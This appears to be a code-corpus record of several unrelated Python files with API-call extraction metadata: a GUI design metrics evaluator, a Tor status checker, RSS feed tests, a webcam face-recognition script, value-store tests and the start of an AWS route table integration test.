input_df = pd.read_csv(self.input_csv_file)
# Exclude some rows
input_df = input_df.loc[input_df["include"] == "yes"]
# Get input GUI design files
self.input_gui_design_files = [
self.input_dir / file for file in input_df["filename"].tolist()
]
# No input CSV file available
else:
# Get input GUI design files
self.input_gui_design_files = list(self.input_dir.glob("*.png"))
def _set_results(self):
# Get output CSV file (previous results)
if self.output_csv_file.exists():
# Create DataFrame
results_df: pd.DataFrame = pd.read_csv(self.output_csv_file)
# Remove unfinished evaluation rows
results_df = results_df.dropna()
# Convert DataFrame to List
self.results = results_df.to_dict("records")
# No output CSV file (previous results) available
else:
self.results = []
def _execute_metrics(self):
# Iterate over input GUI design files
for input_gui_design_file in self.input_gui_design_files[
len(self.results) :
]:
logger.info("Evaluating {}...".format(input_gui_design_file.name))
# Start total timer
start_time_total: float = time.time()
# Initialize GUI design results row
results_row = {}
results_row["filename"] = input_gui_design_file.name
results_row["evaluation_date"] = date.today().isoformat()
# Read GUI design image (PNG)
start_time: float = time.time()
gui_image_png_base64: str = image_utils.read_image(
input_gui_design_file
)
end_time: float = time.time()
results_row["read_image_time"] = round(end_time - start_time, 4)
# Iterate over AIM metrics
for metric in self._METRICS:
# Import metric module
metric_module = importlib.import_module(
"aim.metrics." + metric
)
# Execute metric
start_time: float = time.time()
metric_results: Optional[
List[Any]
] = metric_module.Metric.execute_metric(gui_image_png_base64)
end_time: float = time.time()
results_row[metric.partition("_")[0] + "_time"] = round(
end_time - start_time, 4
)
# Iterate over metrics results
for index, metric_result in enumerate(metric_results):
if type(metric_result) is float:
results_row[
metric.partition("_")[0]
+ "_result_"
+ str(index + 1)
] = round(metric_result, 4)
else:
results_row[
metric.partition("_")[0]
+ "_result_"
+ str(index + 1)
] = metric_result
# End total timer
end_time_total: float = time.time()
results_row["total_evaluation_time"] = round(
end_time_total - start_time_total, 4
)
# Append results
self.results.append(results_row)
# Precaution against crashes: save results after each GUI design
# evaluation instead of after completing all of them
self._save_results()
def _save_results(self):
# Create DataFrame
results_df: pd.DataFrame = pd.DataFrame(self.results)
# Reorder columns
cols: List[str] = results_df.columns.tolist()
sorted(cols)
cols.remove("filename")
cols.remove("evaluation_date")
cols.remove("read_image_time")
cols.remove("total_evaluation_time")
cols = [
"filename",
"evaluation_date",
"total_evaluation_time",
"read_image_time",
] + cols
results_df = results_df[cols]
# Create directories, if needed
if not self.output_dir.exists():
self.output_dir.mkdir(parents=True)
# Save results
results_df.to_csv(self.output_csv_file, index=False)
def _reformat_large_tick_values(self, tick_val, pos):
"""
Turns large tick values (in the billions, millions and thousands) such as 4500 into 4.5K and also appropriately turns 4000 into 4K (no zero after the decimal).
Source: https://dfrieds.com/data-visualizations/how-format-large-tick-values.html
"""
if tick_val >= 1000000000:
val = round(tick_val / 1000000000, 1)
new_tick_format = "{:}B".format(val)
elif tick_val >= 1000000:
val = round(tick_val / 1000000, 1)
new_tick_format = "{:}M".format(val)
elif tick_val >= 1000:
val = round(tick_val / 1000, 1)
new_tick_format = "{:}K".format(val)
else:
new_tick_format = round(tick_val, 4)
# Make new_tick_format into a string value
new_tick_format = str(new_tick_format)
# Code below will keep 4.5M as is but change values such as 4.0M to 4M since that zero after the decimal isn't needed
index_of_decimal = new_tick_format.find(".")
if index_of_decimal != -1 and (tick_val >= 1000 or tick_val == 0):
value_after_decimal = new_tick_format[index_of_decimal + 1]
if value_after_decimal == "0":
# Remove the 0 after the decimal point since it's not needed
new_tick_format = (
new_tick_format[0:index_of_decimal]
+ new_tick_format[index_of_decimal + 2 :]
)
return new_tick_format
def _plot_results(self):
# Plot results
if self.plot_results:
# Get output CSV file (evaluation results)
evaluation_results_df = pd.read_csv(
self.output_csv_file,
header=0,
dtype={"filename": "str"},
parse_dates=[1],
)
# Plot metric evaluation results
width: int = 700 # in pixels
height: int = 500 # in pixels
dpi: int = 72
for key, value in self._METRIC_RESULTS.items():
# Create a new figure and configure it
sns.set(rc={"figure.figsize": (width / dpi, height / dpi)})
sns.set_style("ticks")
sns.set_context("paper", font_scale=1.5)
plt.figure()
# Plot data on a histogram and configure it
ax = sns.histplot(
list(evaluation_results_df[key]),
kde=False,
color="#7553A0",
bins=30,
)
ax.set_xlabel(
value["name"],
fontstyle="normal",
fontweight="normal",
labelpad=10,
)
ax.set_ylabel(
"Frequency",
fontstyle="normal",
fontweight="normal",
labelpad=10,
)
ax.xaxis.grid(False)
ax.yaxis.grid(False)
ax.xaxis.set_major_formatter(
ticker.FuncFormatter(self._reformat_large_tick_values)
)
sns.despine(ax=ax, left=False, bottom=False)
# Save plot
output_plot_file: Path = (
self.output_dir / "{}_evaluator.png".format(key)
)
plt.savefig(output_plot_file, dpi=dpi, transparent=False)
# Public methods
def evaluate(self):
self._set_input_csv_file()
self._set_input_gui_design_files()
self._set_results()
self._execute_metrics()
self._plot_results()
| [
"seaborn.set",
"matplotlib.pyplot.savefig",
"importlib.import_module",
"pandas.read_csv",
"pathlib.Path",
"seaborn.despine",
"matplotlib.ticker.FuncFormatter",
"seaborn.set_context",
"seaborn.set_style",
"matplotlib.pyplot.figure",
"pandas.DataFrame",
"datetime.date.today",
"aim.core.image_u... | [((2037, 2052), 'pathlib.Path', 'Path', (['input_dir'], {}), '(input_dir)\n', (2041, 2052), False, 'from pathlib import Path\n'), ((6512, 6538), 'pandas.DataFrame', 'pd.DataFrame', (['self.results'], {}), '(self.results)\n', (6524, 6538), True, 'import pandas as pd\n'), ((2249, 2265), 'pathlib.Path', 'Path', (['output_dir'], {}), '(output_dir)\n', (2253, 2265), False, 'from pathlib import Path\n'), ((2783, 2815), 'pandas.read_csv', 'pd.read_csv', (['self.input_csv_file'], {}), '(self.input_csv_file)\n', (2794, 2815), True, 'import pandas as pd\n'), ((3455, 3488), 'pandas.read_csv', 'pd.read_csv', (['self.output_csv_file'], {}), '(self.output_csv_file)\n', (3466, 3488), True, 'import pandas as pd\n'), ((4121, 4132), 'time.time', 'time.time', ([], {}), '()\n', (4130, 4132), False, 'import time\n'), ((4421, 4432), 'time.time', 'time.time', ([], {}), '()\n', (4430, 4432), False, 'import time\n'), ((4473, 4518), 'aim.core.image_utils.read_image', 'image_utils.read_image', (['input_gui_design_file'], {}), '(input_gui_design_file)\n', (4495, 4518), False, 'from aim.core import image_utils\n'), ((4579, 4590), 'time.time', 'time.time', ([], {}), '()\n', (4588, 4590), False, 'import time\n'), ((6032, 6043), 'time.time', 'time.time', ([], {}), '()\n', (6041, 6043), False, 'import time\n'), ((8924, 9015), 'pandas.read_csv', 'pd.read_csv', (['self.output_csv_file'], {'header': '(0)', 'dtype': "{'filename': 'str'}", 'parse_dates': '[1]'}), "(self.output_csv_file, header=0, dtype={'filename': 'str'},\n parse_dates=[1])\n", (8935, 9015), True, 'import pandas as pd\n'), ((4820, 4868), 'importlib.import_module', 'importlib.import_module', (["('aim.metrics.' + metric)"], {}), "('aim.metrics.' + metric)\n", (4843, 4868), False, 'import importlib\n'), ((4977, 4988), 'time.time', 'time.time', ([], {}), '()\n', (4986, 4988), False, 'import time\n'), ((5173, 5184), 'time.time', 'time.time', ([], {}), '()\n', (5182, 5184), False, 'import time\n'), ((9379, 9438), 'seaborn.set', 'sns.set', ([], {'rc': "{'figure.figsize': (width / dpi, height / dpi)}"}), "(rc={'figure.figsize': (width / dpi, height / dpi)})\n", (9386, 9438), True, 'import seaborn as sns\n'), ((9455, 9477), 'seaborn.set_style', 'sns.set_style', (['"""ticks"""'], {}), "('ticks')\n", (9468, 9477), True, 'import seaborn as sns\n'), ((9494, 9534), 'seaborn.set_context', 'sns.set_context', (['"""paper"""'], {'font_scale': '(1.5)'}), "('paper', font_scale=1.5)\n", (9509, 9534), True, 'import seaborn as sns\n'), ((9551, 9563), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (9561, 9563), True, 'import matplotlib.pyplot as plt\n'), ((10452, 10496), 'seaborn.despine', 'sns.despine', ([], {'ax': 'ax', 'left': '(False)', 'bottom': '(False)'}), '(ax=ax, left=False, bottom=False)\n', (10463, 10496), True, 'import seaborn as sns\n'), ((10672, 10729), 'matplotlib.pyplot.savefig', 'plt.savefig', (['output_plot_file'], {'dpi': 'dpi', 'transparent': '(False)'}), '(output_plot_file, dpi=dpi, transparent=False)\n', (10683, 10729), True, 'import matplotlib.pyplot as plt\n'), ((4321, 4333), 'datetime.date.today', 'date.today', ([], {}), '()\n', (4331, 4333), False, 'from datetime import date\n'), ((10363, 10417), 'matplotlib.ticker.FuncFormatter', 'ticker.FuncFormatter', (['self._reformat_large_tick_values'], {}), '(self._reformat_large_tick_values)\n', (10383, 10417), True, 'import matplotlib.ticker as ticker\n')] |
# MIT License
#
# Copyright (c) 2018 k1dd00
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE
# -*- coding: utf-8; mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vim: fileencoding=utf-8 tabstop=4 expandtab shiftwidth=4
# pylint: disable=C0103,C0301,W1202,W0212
import urllib2
from BeautifulSoup import BeautifulSOAP
class TorCheck(object):
"""
The TorCheck class.
This class checks the tor status and ip address
"""
IP_CHECK_ENDPOINT = "http://icanhazip.com"
TOR_CHECK_ENDPOINT = "https://check.torproject.org"
def __init__(self):
self.text_key = "congratulations"
def check_ip(self):
"""
Checks the ip address
Returns
-------
ip: str
The ip address
"""
request = urllib2.urlopen(self.IP_CHECK_ENDPOINT)
response = request.read()
return response.strip()
def check_tor_status(self):
"""
Checks the tor status
Returns
-------
status: Bool
The tor status
"""
html = urllib2.urlopen(self.TOR_CHECK_ENDPOINT).read()
parsed_html = BeautifulSOAP(html)
content = parsed_html.body.find('h1', attrs={'class':'not'}).text
return self.text_key in content.lower()
| [
"BeautifulSoup.BeautifulSOAP",
"urllib2.urlopen"
] | [((1811, 1850), 'urllib2.urlopen', 'urllib2.urlopen', (['self.IP_CHECK_ENDPOINT'], {}), '(self.IP_CHECK_ENDPOINT)\n', (1826, 1850), False, 'import urllib2\n'), ((2175, 2194), 'BeautifulSoup.BeautifulSOAP', 'BeautifulSOAP', (['html'], {}), '(html)\n', (2188, 2194), False, 'from BeautifulSoup import BeautifulSOAP\n'), ((2105, 2145), 'urllib2.urlopen', 'urllib2.urlopen', (['self.TOR_CHECK_ENDPOINT'], {}), '(self.TOR_CHECK_ENDPOINT)\n', (2120, 2145), False, 'import urllib2\n')] |
import unittest
from models import FeedSet, Base, RSSContent
import config
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from unittest.mock import MagicMock
from test_data.feedparser_data import fake_response
from helpers import RSSContentHelper, FeedSetHelper
class TestFeedSet(unittest.TestCase):
def setUp(self):
url = config.DB_TEST_URL
if not url:
self.skipTest("No database URL set")
engine = sqlalchemy.create_engine(url)
Base.metadata.drop_all(engine)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
self.session = Session()
feedparser_fake_response = fake_response
def feed_data_dict(self):
data = {
'urls': ['https://news.ycombinator.com/rss'],
'hashtags': '#example',
'twitter': {
'consumer_key': '<KEY>',
'access_secret': '<KEY>',
'consumer_secret': '<KEY>',
'access_key': '<KEY>'
},
'name': 'SimpleItRocks'
}
return data
def test_get_twitter_credentials(self):
data = self.feed_data_dict()
feed = FeedSet(data)
keys = feed.twitter_keys
self.assertIsInstance(keys, dict)
self.assertIn('consumer_key', keys)
self.assertIn('access_key', keys)
self.assertIn('consumer_secret', keys)
self.assertIn('access_secret', keys)
def test_urls(self):
data = self.feed_data_dict()
feed = FeedSet(data)
urls = feed.urls
self.assertIsInstance(urls, list)
@unittest.mock.patch('feedparser.parse', return_value=feedparser_fake_response)
def test_save_new_pages(self, feedparser_fake_response):
self.assertEqual(len(self.session.query(RSSContent).all()), 0)
helper = FeedSetHelper(self.session, self.feed_data_dict())
helper.get_pages_from_feeds()
self.assertNotEqual(len(self.session.query(RSSContent).all()), 0)
@unittest.mock.patch('feedparser.parse', return_value=feedparser_fake_response)
def test_not_save_existing_pages(self, feedparser_fake_response):
# presave an item that is present in the retrieved feed, to check if it
# has not been saved after downloading new feeds
entry = fake_response.entries[0]
items_count = len(fake_response.entries)
rsscontent = RSSContent(title=entry.title, url=entry.link)
self.session.add(rsscontent)
self.assertEqual(len(self.session.query(RSSContent).all()), 1)
helper = FeedSetHelper(self.session, self.feed_data_dict())
helper.get_pages_from_feeds()
self.assertEqual(len(self.session.query(RSSContent).all()), items_count, "Entries count has changed")
if __name__ == '__main__':
unittest.main()
| [
"sqlalchemy.orm.sessionmaker",
"models.FeedSet",
"sqlalchemy.create_engine",
"models.RSSContent",
"unittest.main",
"models.Base.metadata.drop_all",
"unittest.mock.patch",
"models.Base.metadata.create_all"
] | [((1645, 1723), 'unittest.mock.patch', 'unittest.mock.patch', (['"""feedparser.parse"""'], {'return_value': 'feedparser_fake_response'}), "('feedparser.parse', return_value=feedparser_fake_response)\n", (1664, 1723), False, 'import unittest\n'), ((2043, 2121), 'unittest.mock.patch', 'unittest.mock.patch', (['"""feedparser.parse"""'], {'return_value': 'feedparser_fake_response'}), "('feedparser.parse', return_value=feedparser_fake_response)\n", (2062, 2121), False, 'import unittest\n'), ((2852, 2867), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2865, 2867), False, 'import unittest\n'), ((452, 481), 'sqlalchemy.create_engine', 'sqlalchemy.create_engine', (['url'], {}), '(url)\n', (476, 481), False, 'import sqlalchemy\n'), ((490, 520), 'models.Base.metadata.drop_all', 'Base.metadata.drop_all', (['engine'], {}), '(engine)\n', (512, 520), False, 'from models import FeedSet, Base, RSSContent\n'), ((529, 561), 'models.Base.metadata.create_all', 'Base.metadata.create_all', (['engine'], {}), '(engine)\n', (553, 561), False, 'from models import FeedSet, Base, RSSContent\n'), ((580, 605), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'engine'}), '(bind=engine)\n', (592, 605), False, 'from sqlalchemy.orm import sessionmaker\n'), ((1206, 1219), 'models.FeedSet', 'FeedSet', (['data'], {}), '(data)\n', (1213, 1219), False, 'from models import FeedSet, Base, RSSContent\n'), ((1552, 1565), 'models.FeedSet', 'FeedSet', (['data'], {}), '(data)\n', (1559, 1565), False, 'from models import FeedSet, Base, RSSContent\n'), ((2448, 2493), 'models.RSSContent', 'RSSContent', ([], {'title': 'entry.title', 'url': 'entry.link'}), '(title=entry.title, url=entry.link)\n', (2458, 2493), False, 'from models import FeedSet, Base, RSSContent\n')] |
## -*- coding: utf-8 -*-
"""
Created on Tue Sep 26 13:38:17 2017
@author: Administrator
"""
import dlib
import cv2
import numpy as np
from sklearn.externals import joblib
import os
import pathAttributes
#ap = argparse.ArgumentParser()
#ap.add_argument("-p", "--shape-predictor", metavar="D:\\用户目录\\下载\\shape_predictor_68_face_landmarks.dat\\shape_predictor_68_face_landmarks.dat", required=True,
# help="path to facial landmark predictor")
#ap.add_argument("-r", "--picamera", type=int, default=-1,
#help="whether or not the Raspberry Pi camera should be used")
#args = vars(ap.parse_args())
def faceRecognition():
f = open(pathAttributes.dictionary, 'r')
result = {}
for line in f.readlines():
line = line.strip()
print(line)
if not len(line):
continue
result[line.split(':')[0]] = line.split(':')[1]
f.close()
#face_detection_model = "C:\\Users\\Administrator\\shape_predictor_68_face_landmarks.dat"
#print(result)
print("[INFO] loading facial landmark predictor...")
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(pathAttributes.face_detection_model)
face_encoder = dlib.face_recognition_model_v1(pathAttributes.face_recognition_model)
print("[INFO] camera sensor warming up...")
#vs = VideoStream().start()
video_capture = cv2.VideoCapture(0) #open camra by calling opencv's function
#time.sleep(2.0)
"""
chris_image = cv2.imread('E:\\49.png')
#chris_image_gray = cv2.cvtColor(chris_image, cv2.COLOR_GRAY2RGB)
chris = detector(chris_image, 1)
chris_shape = predictor(chris_image, chris[0])
chris_face_encoding = face_encoder.compute_face_descriptor(chris_image, chris_shape, 1)
print("Chris:"+str(chris_face_encoding))
julie_image = cv2.imread('E:\\1.png')
#julie_image_gray = cv2.cvtColor(julie_image, cv2.COLOR_GRAY2RGB)
julie = detector(julie_image, 1)
julie_shape = predictor(julie_image, julie[0])
julie_face_encoding = face_encoder.compute_face_descriptor(julie_image, julie_shape, 1)
print("JULIE:"+str(julie_face_encoding))
"""
face_locations = []
face_encodings = []
face_names = []
raw_list = []
while True:
raw_list = []
face_names = []
# grab the frame from the threaded video stream, resize it to
# have a maximum width of 400 pixels, and convert it to
# grayscale
#frame = vs.read()
#frame = imutils.resize(frame, width=400)
ret, frame = video_capture.read()
#dim = (int(frame.shape[1] * 0.25), int(frame.shape[0] * 0.25))
dim = (int(frame.shape[1] * 0.2), int(frame.shape[0] * 0.2))
small_frame = cv2.resize(frame, dim)
gray_one_channel = cv2.cvtColor(small_frame, cv2.COLOR_BGR2GRAY)
#face_locations = face_recognition.face_locations(small_frame)
gray = cv2.cvtColor(gray_one_channel, cv2.COLOR_GRAY2RGB)
# detect faces in the grayscale frame
rects = detector(gray, 1)
#print("rects:"+str(rects))
for rect in rects:
#print("rect:"+str(rect))
css = [rect.top(), rect.right(), rect.bottom(), rect.left()]
location = max(css[0], 0), min(css[1], gray.shape[1]), min(css[2], gray.shape[0]), max(css[3], 0)
face_location = dlib.rectangle(location[3], location[0], location[1], location[2])
face_locations.append(face_location)
raw_list.append(css)
shape = predictor(gray, face_location)
face_encoding = face_encoder.compute_face_descriptor(gray, shape, 1)
#print("random:"+str(face_encoding))
"""
match_chris = []
match_julie = []
chris_norm = 0
julie_norm = 0
if len([chris_face_encoding]) == 0:
match_chris = list(0<=0.6)
else:
chris_norm = np.linalg.norm(np.array([chris_face_encoding]) - np.array([face_encoding]), axis=1)
match_chris = list(chris_norm<= 0.6)
print("chris:"+str(chris_norm))
name = "Unknown"
if len([julie_face_encoding]) == 0:
match_julie = list(0<=0.6)
else:
julie_norm = np.linalg.norm(np.array([julie_face_encoding]) - np.array([face_encoding]), axis=1)
match_julie = list(julie_norm <= 0.6)
print("julie:"+str(julie_norm))
if match_chris[0]!=0 and match_julie[0]!=0:
if julie_norm>chris_norm:
name = "Chris"
else:
name = "Julie"
elif match_julie[0] == 0 and match_chris[0] !=0:
name = "Chris"
elif match_julie[0] != 0 and match_chris[0] ==0:
name = "Julie"
else:
name = "Unknown"
"""
threshold = -0.05 #-0.1 for C=0.1 4-8 6 for 0.3
proba = 0.72
clf = joblib.load(pathAttributes.SVM_model)
feeaturesArray = np.array(face_encoding)
ID = clf.predict(feeaturesArray.reshape(1,-1))[0]
name = result[str(ID)]
#scores = clf.decision_function(feeaturesArray.reshape(1,-1))
scores = clf.predict_proba(feeaturesArray.reshape(1,-1))
"""
scores_sorted = np.sort(scores)
second_biggest = scores_sorted[0][-2]
minimum = scores_sorted[0][0]
biggest_score = np.max(scores)
gap = biggest_score - minimum
gap_2 = biggest_score - second_biggest
print(gap_2)
percentage = gap_2/gap *100
print(percentage)
if percentage < 30:
name = "unknown"
""" """
biggest_score = np.max(scores)
if biggest_score < threshold:
name = "unknown"
"""
biggest_score = np.max(scores)
if biggest_score < proba:
name="unknown"
#scores = scores - np.min(scores)
#scores = scores/np.max(scores)
print(scores,name)
face_names.append(name)
#print(face_names)
for (top, right, bottom, left), name in zip(raw_list, face_names):
# Scale back up face locations since the frame we detected in was scaled to 1/4 size
top *= 5
right *= 5
bottom *= 5
left *= 5
# Draw a box around the faceq
cv2.rectangle(frame, (left-10, top-10), (right+10, bottom+10), (0, 0, 255), 2)
# Draw a label with a name below the face
cv2.rectangle(frame, (left-10, bottom+10), (right+10, bottom+45), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left, bottom + 30), font, 1.0, (255, 255, 255), 1)
cv2.imshow('Video', frame) #display the camra
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
faceRecognition()
| [
"cv2.rectangle",
"dlib.face_recognition_model_v1",
"dlib.rectangle",
"sklearn.externals.joblib.load",
"dlib.shape_predictor",
"cv2.imshow",
"numpy.max",
"dlib.get_frontal_face_detector",
"numpy.array",
"cv2.putText",
"cv2.destroyAllWindows",
"cv2.VideoCapture",
"cv2.cvtColor",
"cv2.resize"... | [((1116, 1148), 'dlib.get_frontal_face_detector', 'dlib.get_frontal_face_detector', ([], {}), '()\n', (1146, 1148), False, 'import dlib\n'), ((1166, 1223), 'dlib.shape_predictor', 'dlib.shape_predictor', (['pathAttributes.face_detection_model'], {}), '(pathAttributes.face_detection_model)\n', (1186, 1223), False, 'import dlib\n'), ((1244, 1313), 'dlib.face_recognition_model_v1', 'dlib.face_recognition_model_v1', (['pathAttributes.face_recognition_model'], {}), '(pathAttributes.face_recognition_model)\n', (1274, 1313), False, 'import dlib\n'), ((1423, 1442), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (1439, 1442), False, 'import cv2\n'), ((7424, 7447), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (7445, 7447), False, 'import cv2\n'), ((2802, 2824), 'cv2.resize', 'cv2.resize', (['frame', 'dim'], {}), '(frame, dim)\n', (2812, 2824), False, 'import cv2\n'), ((2853, 2898), 'cv2.cvtColor', 'cv2.cvtColor', (['small_frame', 'cv2.COLOR_BGR2GRAY'], {}), '(small_frame, cv2.COLOR_BGR2GRAY)\n', (2865, 2898), False, 'import cv2\n'), ((2987, 3037), 'cv2.cvtColor', 'cv2.cvtColor', (['gray_one_channel', 'cv2.COLOR_GRAY2RGB'], {}), '(gray_one_channel, cv2.COLOR_GRAY2RGB)\n', (2999, 3037), False, 'import cv2\n'), ((7219, 7245), 'cv2.imshow', 'cv2.imshow', (['"""Video"""', 'frame'], {}), "('Video', frame)\n", (7229, 7245), False, 'import cv2\n'), ((3435, 3501), 'dlib.rectangle', 'dlib.rectangle', (['location[3]', 'location[0]', 'location[1]', 'location[2]'], {}), '(location[3], location[0], location[1], location[2])\n', (3449, 3501), False, 'import dlib\n'), ((5170, 5207), 'sklearn.externals.joblib.load', 'joblib.load', (['pathAttributes.SVM_model'], {}), '(pathAttributes.SVM_model)\n', (5181, 5207), False, 'from sklearn.externals import joblib\n'), ((5238, 5261), 'numpy.array', 'np.array', (['face_encoding'], {}), '(face_encoding)\n', (5246, 5261), True, 'import numpy as np\n'), ((6161, 6175), 'numpy.max', 'np.max', (['scores'], {}), '(scores)\n', (6167, 6175), True, 'import numpy as np\n'), ((6802, 6893), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(left - 10, top - 10)', '(right + 10, bottom + 10)', '(0, 0, 255)', '(2)'], {}), '(frame, (left - 10, top - 10), (right + 10, bottom + 10), (0, \n 0, 255), 2)\n', (6815, 6893), False, 'import cv2\n'), ((6967, 7070), 'cv2.rectangle', 'cv2.rectangle', (['frame', '(left - 10, bottom + 10)', '(right + 10, bottom + 45)', '(0, 0, 255)', 'cv2.FILLED'], {}), '(frame, (left - 10, bottom + 10), (right + 10, bottom + 45), (\n 0, 0, 255), cv2.FILLED)\n', (6980, 7070), False, 'import cv2\n'), ((7123, 7199), 'cv2.putText', 'cv2.putText', (['frame', 'name', '(left, bottom + 30)', 'font', '(1.0)', '(255, 255, 255)', '(1)'], {}), '(frame, name, (left, bottom + 30), font, 1.0, (255, 255, 255), 1)\n', (7134, 7199), False, 'import cv2\n'), ((7330, 7344), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (7341, 7344), False, 'import cv2\n')] |
from gamegym.game import Game, Situation
from gamegym.utils import get_rng
from gamegym.distribution import Explicit
from gamegym.value_learning.valuestore import LinearValueStore
import numpy as np
import pytest
from scipy.sparse import csr_matrix
def test_init():
LinearValueStore(shape=(3, 3))
LinearValueStore(np.zeros((4, 3)))
LinearValueStore(np.zeros((4, 3)), shape=(4, 3))
with pytest.raises(Exception):
LinearValueStore((3, 3))
with pytest.raises(Exception):
LinearValueStore(np.zeros((4, 3)), shape=(4, 4))
def test_value_update():
a = np.ones((4, ))
vs = LinearValueStore(a)
f = [0, 2, -1, 3]
assert vs.get(f) == pytest.approx(4.0)
assert vs.get(np.array(f)) == pytest.approx(4.0)
#assert vs.get(csr_matrix(f)) == pytest.approx(4.0)
vs.update(f, -0.5)
assert vs.values == pytest.approx([1, 0, 1.5, -0.5])
assert vs.get(f) == pytest.approx(-3.0)
def test_norm():
vs = LinearValueStore(shape=(2, 3), fix_mean=1.0)
| [
"pytest.approx",
"numpy.ones",
"gamegym.value_learning.valuestore.LinearValueStore",
"numpy.array",
"numpy.zeros",
"pytest.raises"
] | [((272, 302), 'gamegym.value_learning.valuestore.LinearValueStore', 'LinearValueStore', ([], {'shape': '(3, 3)'}), '(shape=(3, 3))\n', (288, 302), False, 'from gamegym.value_learning.valuestore import LinearValueStore\n'), ((590, 603), 'numpy.ones', 'np.ones', (['(4,)'], {}), '((4,))\n', (597, 603), True, 'import numpy as np\n'), ((614, 633), 'gamegym.value_learning.valuestore.LinearValueStore', 'LinearValueStore', (['a'], {}), '(a)\n', (630, 633), False, 'from gamegym.value_learning.valuestore import LinearValueStore\n'), ((960, 1004), 'gamegym.value_learning.valuestore.LinearValueStore', 'LinearValueStore', ([], {'shape': '(2, 3)', 'fix_mean': '(1.0)'}), '(shape=(2, 3), fix_mean=1.0)\n', (976, 1004), False, 'from gamegym.value_learning.valuestore import LinearValueStore\n'), ((324, 340), 'numpy.zeros', 'np.zeros', (['(4, 3)'], {}), '((4, 3))\n', (332, 340), True, 'import numpy as np\n'), ((363, 379), 'numpy.zeros', 'np.zeros', (['(4, 3)'], {}), '((4, 3))\n', (371, 379), True, 'import numpy as np\n'), ((404, 428), 'pytest.raises', 'pytest.raises', (['Exception'], {}), '(Exception)\n', (417, 428), False, 'import pytest\n'), ((438, 462), 'gamegym.value_learning.valuestore.LinearValueStore', 'LinearValueStore', (['(3, 3)'], {}), '((3, 3))\n', (454, 462), False, 'from gamegym.value_learning.valuestore import LinearValueStore\n'), ((472, 496), 'pytest.raises', 'pytest.raises', (['Exception'], {}), '(Exception)\n', (485, 496), False, 'import pytest\n'), ((680, 698), 'pytest.approx', 'pytest.approx', (['(4.0)'], {}), '(4.0)\n', (693, 698), False, 'import pytest\n'), ((733, 751), 'pytest.approx', 'pytest.approx', (['(4.0)'], {}), '(4.0)\n', (746, 751), False, 'import pytest\n'), ((855, 887), 'pytest.approx', 'pytest.approx', (['[1, 0, 1.5, -0.5]'], {}), '([1, 0, 1.5, -0.5])\n', (868, 887), False, 'import pytest\n'), ((912, 931), 'pytest.approx', 'pytest.approx', (['(-3.0)'], {}), '(-3.0)\n', (925, 931), False, 'import pytest\n'), ((523, 539), 'numpy.zeros', 'np.zeros', (['(4, 3)'], {}), '((4, 3))\n', (531, 539), True, 'import numpy as np\n'), ((717, 728), 'numpy.array', 'np.array', (['f'], {}), '(f)\n', (725, 728), True, 'import numpy as np\n')] |
# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may
# not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Integration tests for the RouteTable API.
"""
import pytest
import time
import logging
from acktest.resources import random_suffix_name
from acktest.k8s import resource as k8s
from e2e import service_marker, CRD_GROUP, CRD_VERSION, load_ec2_resource
from e2e.replacement_values import REPLACEMENT_VALUES
from e2e.bootstrap_resources import get_bootstrap_resources
RESOURCE_PLURAL = "routetables"
DEFAULT_WAIT_AFTER_SECONDS = 5
CREATE_WAIT_AFTER_SECONDS = 10
DELETE_WAIT_AFTER_SECONDS = 10
def get_route_table(ec2_client, route_table_id: str) -> dict:
try:
resp = ec2_client.describe_route_tables(
Filters=[{"Name": "route-table-id", "Values": [route_table_id]}]
)
except Exception as e:
logging.debug(e)
return None
if len(resp["RouteTables"]) == 0:
return None
return resp["RouteTables"][0]
def route_table_exists(ec2_client, route_table_id: str) -> bool:
return get_route_table(ec2_client, route_table_id) is not None
def get_routes(ec2_client, route_table_id: str) -> list:
try:
resp = ec2_client.describe_route_tables(
Filters=[{"Name": "route-table-id", "Values": [route_table_id]}]
)
except Exception as e:
logging.debug(e)
return None
if len(resp["RouteTables"]) == 0:
return None
return resp["RouteTables"][0]["Routes"]
def route_exists(ec2_client, route_table_id: str, gateway_id: str, origin: str) -> bool:
routes = get_routes(ec2_client, route_table_id)
for route in routes:
if route["Origin"] == origin and route["GatewayId"] == gateway_id:
return True
return False
@service_marker
@pytest.mark.canary
class TestRouteTable:
def test_create_delete(self, ec2_client):
test_resource_values = REPLACEMENT_VALUES.copy()
